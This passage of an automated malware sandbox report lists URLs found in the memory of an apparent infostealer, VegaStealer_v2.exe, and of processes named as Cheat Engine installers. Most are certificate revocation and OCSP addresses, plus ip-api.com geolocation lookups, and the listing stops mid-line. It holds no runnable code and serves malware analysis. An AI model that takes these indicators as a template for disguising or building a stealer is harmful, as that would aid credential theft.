HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 28 Dec 2024 21:20:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeAge: 110082Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitVary: Accept-EncodingX-Nf-Request-Id: 01JG7J81N4E6X2E12RP7G7B6GScf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7r0NPIuGsZ62nCmG%2B9T6%2BEJa%2Bvziov%2BnTwYxkAtEToRUQ4abL8%2BF8KwkL4G5621G0oN5enLCnKWm6e37Jg9og3KBJlnmk%2Fv6dSR5evPgEtTsJCxYDl%2BNNqdsbPm4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f9497aa783b334e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1818&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=678&delivery_rate=1553191&cwnd=173&unsent_bytes=0&cid=7087dacb525097ba&ts=478&x=0"

Source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.di
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3039818619.0000000004E2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crPl3.d
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 0000002B.00000002.2600381025.00000265D84D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mHHQ
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.d
Source: VegaStealer_v2.exe, 00000005.00000003.2039557081.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert
Source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.cPom/D
Source: VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com
Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3039818619.0000000004E2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.micr
Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.micro
Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microso
Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsof
Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft
Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.
Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=61439
Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=61439d
Source: v2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fieldsTDl
Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.comd
Source: v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: v2.exe, 00000007.00000002.2192717711.0000000007A81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.0/
Source: powershell.exe, 0000000D.00000002.2259468035.000002505C180000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAFF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DC737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.c
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3039818619.0000000004E2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 